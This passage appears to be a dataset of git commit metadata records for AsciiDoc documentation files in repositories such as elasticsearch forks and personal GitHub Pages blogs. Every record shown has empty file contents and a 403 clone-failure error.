elasticsearch,petabytedata\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,scottsom\/elasticsearch,markharwood\/elasticsearch,ivansun1010\/elasticsearch,petabytedata\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,mmaracic\/elasticsearch,masterweb121\/elasticsearch,infusionsoft\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,AndreKR\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,xingguang2013\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,kalimatas\/elasticsearch,lmtwga\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,episerver\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,jimczi\/elasticsearch,mapr\/elasticsearch,ricardocerq\/elasticsearch,polyfractal\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,YosuaMichael\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,nezirus\/elasticsearch,fred84\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,mapr\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,palecur\/elasticsearch,nrkkalyan\/elasticsearch,infusionsoft\/elasticsearch,shreejay\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fforbeck\/elasticsearch,obourgain\/elasticsearch,cnfire\/elasticsearch-1,mjason3\/elasticsearch,HonzaKral\/elasticsearch,nezirus\/elasticsearch,andrestc\/elasticsearch,kalburgimanjunath\/elasticsearch,jprante\/elasticsearch,nomoa\/elasticsearch,sdauletau\/elasticsearch,wangtuo\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,mjason3\/elasticsearch,myelin\/elasticsearch,wbowling\/elasticsearch,JSCooke\/elasticsearch,markharwood\/elasticsearch,nilabhsagar\/elasticsearch,tebriel\/elasticsearch,Helen-Zhao\/elasticsearch,episerver\/elasticsearch,ivansun1010\/elasticsearch,palecur\/elasticsearch,girirajsharma\/elasticsearch,i-am-Nathan\/elasticsearch,fernandozhu\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,ZTE-PaaS\/elasticsearch,ESamir\/elasticsearch,mohit\/elasticsearch,snikch\/elasticsearch,socialrank\/elasticsearch,wuranbo\/elasticsearch,wbowling\/elasticsearch,karthikjaps\/elasticsearch,coding0011\/elasticsearch,PhaedrusTheGreek\/elasticsearch,onegambler\/elasticsearch,rmuir\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,hafkensite\/elasticsearch,nrkkalyan\/elasticsearch,HonzaKral\/elasticsearch,lzo\/elasticsearch-1,weipinghe\/elasticsearch,jprante\/elasticsearch,diendt\/elasticsearch,yanjunh\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,infusionsoft\/elasticsearch,xuzha\/elasticsearch,yynil\/elasticsearch,njlawton\/elasticsearch,gfyoung\/elasticsearch,kalburgimanjunath\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,andrejserafim\/elasticsearch,onegambler\/elasticsearch,nknize\/elasticsearch,jeteve\/elasticsearch,iacdingping\/elasticsearch,myelin\/elasticsearch,liweinan0423\/elasticsearch,cwurm\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,geidies\/elasticsearch,trangvh\/elasticsearch,rhoml\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,davidvgalbraith\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,PhaedrusTheGreek\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,tebriel\/elasticsearch,onegambler\/elasticsearch,PhaedrusTheGreek\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,sreeramjayan\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,mapr\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,cwurm\/elasticsearch,geidies\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,caengcjd\/elasticsearch,mikemccand\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,AndreKR\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cwurm\/elasticsearch,andrestc\/elasticsearch,andrestc\/elasticsearch,drewr\/elasticsearch,pozhidaevak\/elasticsearch,palecur\/elasticsearch,xuzha\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,markharwood\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,episerver\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nomoa\/elasticsearch,iacdingping\/elasticsearch,iacdingping\/elasticsearch,IanvsPoplicola\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,yynil\/elasticsearch,spiegela\/elasticsearch,martinstuga\/elasticsearch,caengcjd\/elasticsearch,lmtwga\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,iacdingping\/elasticsearch,gingerwizard\/elasticsearch,Rygbee\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,kaneshin\/elasticsearch,infusionsoft\/elasticsearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra,martinstuga\/elasticsearch,Helen-Zhao\/elasticsearch,kaneshin\/elasticsearch,rhoml\/elasticsearch,ricardocerq\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,cnfire\/elasticsearch-1,sdauletau\/elasticsearch,jeteve\/elasticsearch,caengcjd\/elasticsearch,YosuaMichael\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,jeteve\/elasticsearch,jpountz\/elasticsearch,lmtwga\/elasticsearch,xuzha\/elasticsearch,markwalkom\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,avikurapati\/elasticsearch,episerver\/elasticsearch,nilabhsagar\/elasticsearch,Collaborne\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra5-rc,jeteve\/elasticsearch,jbertouch\/elasticsearch,xingguang2013\/elasticsearch,mmaracic\/elasticsearch,petabytedata\/elasticsearch,xuzha\/elasticsearch,MisterAndersen\/elasticsearch,karthikjaps\/elasticsearch,coding0011\/elasticsearch,caengcjd\/elasticsearch,caengcjd\/elasticsearch,zkidkid\/elasticsearch,nomoa\/elasticsearch,yynil\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,kunallimaye\/elasticsearch,caengcjd\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,trangvh\/elasticsearch,clintongormley\/elasticsearch,ricardocerq\/elasticsearch,socialrank\/elasticsearch,mortonsykes\/elasticsearch,lks21c\/elasticsearch,jpountz\/elasticsearch,AndreKR\/elasticsearch,fred84\/elasticsearch,zkidkid\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,awislowski\/elasticsearch,kunallimaye\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,polyfractal\/elasticsearch,andrejserafim\/elasticsearch,infusionsoft\/elasticsearch,liweinan0423\/elasticsearch,C-Bish\/elasticsearch,girirajsharma\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,markharwood\/elasticsearch,martinstuga\/elasticsearch,mortonsykes\/elasticsearch,YosuaMichael\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,uschindler\/elasticsearch,rhoml\/elasticsearch,strapdata\/elassandra,sdauletau\/elasticsearch,JervyShi\/elasticsearch,awislowski\/elasticsearch,sdauletau\/elasticsearch,mikemccand\/elasticsearch,schonfeld\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,girirajsharma\/elasticsearch,petabytedata\/elasticsearch,F0lha\/elasticsearch,iacdingping\/elasticsearch,drewr\/elasticsearch,xingguang2013\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,kalburgimanjunath\/elasticsearch,MisterAndersen\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,jchampion\/elasticsearch,clintongormley\/elasticsearch,jbertouch\/elasticsearch,polyfractal\/elasticsearch,LeoYao\/elasticsearch,karthikjaps\/elasticsearch,wbowling\/elasticsearch,onegambler\/elasticsearch,pozhidaevak\/elasticsearch,martinstuga\/elasticsearch,xingguang2013\/elasticsearch,lzo\/elasticsearch-1,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,lmtwga\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,schonfeld\/elasticsearch,fforbeck\/elasticsearch,kalburgimanjunath\/elasticsearch,gingerwizard\/elasticsearch,xingguang2013\/elasticsearch,MisterAndersen\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,wbowling\/elasticsearch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,sreeramjayan\/elasticsearch,kunallimaye\/elasticsearch,Rygbee\/elasticsearch,jpountz\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,dongjoon-hyun\/elasticsearch,schonfeld\/elasticsearch,diendt\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,schonfeld\/elasticsearch,avikurapati\/elasticsearch,lmtwga\/elasticsearch,IanvsPoplicola\/elasticsearch,episerver\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,jpountz\/elasticsearch,YosuaMichael\/elasticsearch,strapdata\/elassandra5-rc,sdauletau\/elasticsearch,fforbeck\/elasticsearch,areek\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,tebriel\/elasticsearch,Collaborne\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,fforbeck\/elasticsearch,qwerty4030\/elasticsearch,andrejserafim\/elasticsearch,scottsom\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,masterweb121\/elasticsearch,awislowski\/elasticsearch,camilojd\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,girirajsharma\/elasticsearch,areek\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,YosuaMichael\/elasticsearch,trangvh\/elasticsearch,clintongormley\/elasticsearch,hafkensite\/elasticsearch,s1monw\/elasticsearch,dpursehouse\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,lzo\/elasticsearch-1,camilojd\/elasticsearch,masterweb121\/elasticsearch,jimczi\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,Collaborne\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,karthikjaps\/elasticsearch,lmtwga\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,onegambler\/elasticsearch,masaruh\/elasticsearch,henakamaMSFT\/elasticsearch,markharwood\/elasticsearch,njlawton\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,kalburgimanjunath\/elasticsearch,schonfeld\/elasticsearch,weipinghe\/elasticsearch,onegambler\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,tebriel\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,davidvgalbraith\/elasticsearch,lzo\/elasticsearch-1,mjason3\/elasticsearch,artnowo\/elasticsearch,kalburgimanjunath\/elasticsearch,MaineC\/elasticsearch,infusionsoft\/elasticsearch,rhoml\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,kunallimaye\/elasticsearch,camilojd\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,dongjoon-hyun\/elasticsearch,bawse\/elasticsearch,rhoml\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,nomoa\/elasticsearch,shreejay\/elasticsearch,nomoa\/elasticsearch,hafkensite\/elasticsearch,xingguang2013\/elasticsearch,hafkensite\/elasticsearch,snikch\/elasticsearch,kaneshin\/elasticsearch,clintongormley\/elasticsearch,gingerwizard\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra,martinstuga\/elasticsearch,areek\/elasticsearch,C-Bish\/elasticsearch,infusionsoft\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,wbowling\/elasticsearch,umeshdangat\/elasticsearch,nrkkalyan\/elasticsearch,cnfire\/elasticsearch-1,henakamaMSFT\/elasticsearch,strapdata\/elassandra,socialrank\/elasticsearch,areek\/elasticsearch,ivansun1010\/elasticsearch,snikch\/elasticsearch,maddin2016\/elasticsearch,vroyer\/elassandra,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,andrejserafim\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra5-rc,davidvgalbraith\/elasticsearch,yynil\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,nrkkalyan\/elasticsearch,bawse\/elasticsearch,elasticdog\/elasticsearch,Rygbee\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,rmuir\/elasticsearch,cwurm\/elasticsearch,ZTE-PaaS\/elasticsearch,awislowski\/elasticsearch,nknize\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,avikurapati\/elasticsearch,lmtwga\/elasticsearch,jchampion\/elasticsearch,Stacey-Gammon\/elasticsearch,trangvh\/elasticsearch,ivansun1010\/elasticsearch,drewr\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4faf3cf02ca44f64bf89ac043e57dbdd12107281","subject":"Add docs for error file configuration (#29032)","message":"Add docs for error file configuration (#29032)\n\nThis commit adds docs for configuring the error file setting for where\r\nthe JVM writes fatal error logs.","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/setup\/important-settings\/error-file.asciidoc","new_file":"docs\/reference\/setup\/important-settings\/error-file.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10fb13ab196c36eef70d87719c5b47cff6bf46e2","subject":"Update 2015-05-03-test.adoc","message":"Update 2015-05-03-test.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2015-05-03-test.adoc","new_file":"_posts\/2015-05-03-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc1f0187d617bbca982b1c7ed394fb9bfc867e19","subject":"Update 2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","message":"Update 2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","new_file":"_posts\/2016-04-13-Puzzle-2-H-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe0bf2a5f948f1c14c18aa52081686afc59fcfa4","subject":"Update 2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","message":"Update 2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","new_file":"_posts\/2017-05-13-Der-Rechtsraum-im-Rechtsstaat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7ed50b1886c617e1972184665ea9db2687d82d7","subject":"Renamed '_posts\/2019-05-15-Where-is-Prateek.adoc' to '_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc'","message":"Renamed '_posts\/2019-05-15-Where-is-Prateek.adoc' to '_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc'","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc","new_file":"_posts\/2019-05-15-Where-is-Prateek-a-Unity-Game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8b49c2c4b65b3df242f8f905972778e4bd26fcd","subject":"Update 2015-10-02-Software-architecture-like-a-building-own-house.adoc","message":"Update 2015-10-02-Software-architecture-like-a-building-own-house.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-10-02-Software-architecture-like-a-building-own-house.adoc","new_file":"_posts\/2015-10-02-Software-architecture-like-a-building-own-house.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73d6b6e195c02017fe6a9c519553885524d2678d","subject":"Create free_skymaps.adoc","message":"Create free_skymaps.adoc\n\nAdded tutorial on skymap creation.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"719f98a4171abe0105fc15519335354088833cff","subject":"y2b create post My Ultimate Setup - Episode 1","message":"y2b create post My Ultimate Setup - Episode 1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-17-My-Ultimate-Setup--Episode-1.adoc","new_file":"_posts\/2015-03-17-My-Ultimate-Setup--Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa6969d45eded36ead3151fd7c7c218e37cfa03c","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96ab793e00f73bbb8653aa7080c2c8094c6f515","subject":"Update 2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","message":"Update 2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","new_file":"_posts\/2017-12-24-Episode-122-A-Very-Herculean-Festivus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2a4828a074ce6844ef5b05f143b354856f0f57a","subject":"Fix package name for JavaEsSpark in example.","message":"Fix package name for JavaEsSpark in example.\n\nThe package name in the text has an extra `hadoop` in it, and in the code example `java` and `api` are swapped. Hopefully this is fixed before someone else wastes several hours trying to figure out why the example doesn't build.\n","repos":"lgscofield\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f020e9e4863c23c319b2417a22d89e5ba0135050","subject":"Create README for installing Linux","message":"Create README for installing Linux\n\nDescribed the benefits and disadvantages for both dual booting and using virtual\nmachine and provided links on how to install both ways\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/How-To-Install-Linux\/README.adoc","new_file":"Development-Guide\/How-To-Install-Linux\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d0ad464c7edf0be54661bc460bbf14834510a596","subject":"add documention how to use sahi with webpack-dev-server, closes #295","message":"add documention how to use sahi with webpack-dev-server, closes #295\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/manual\/testdefinition\/advanced-topics\/sahi-webpack.adoc","new_file":"docs\/manual\/testdefinition\/advanced-topics\/sahi-webpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83413b6fcbc8b8ae7991a59d14afdedf4f73501f","subject":"create doc","message":"create doc\n","repos":"slin1972\/-1s,slin1972\/-1s,slin1972\/-1s,slin1972\/-1s","old_file":"doc\/client.adoc","new_file":"doc\/client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slin1972\/-1s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"addfbccf5d40c51a132e7ebbe27b5215b386ddc4","subject":"Fix #192 (#193)","message":"Fix #192 (#193)\n\n* Fix #192\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #192\r\n\r\nedit phrasing\r\n\r\n* Fix #192\r\n\r\nedit getBoolean\r\n\r\n* Fix #192\r\n\r\nedit link and table\r\n\r\n* Fix #192 - tweak getBoolean\r\n\r\n* Fix #192 tweak system properties descriptions\r\n\r\n* Fix #192 tweak system properties descriptions","repos":"OpenHFT\/Chronicle-Network","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Network.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0298bc77547d76112470dcb31f4fd5b00558aa0","subject":"More about wrapping exc","message":"More about wrapping exc\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f40810a9f304485d325b49c5f366e7367a8c72e4","subject":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 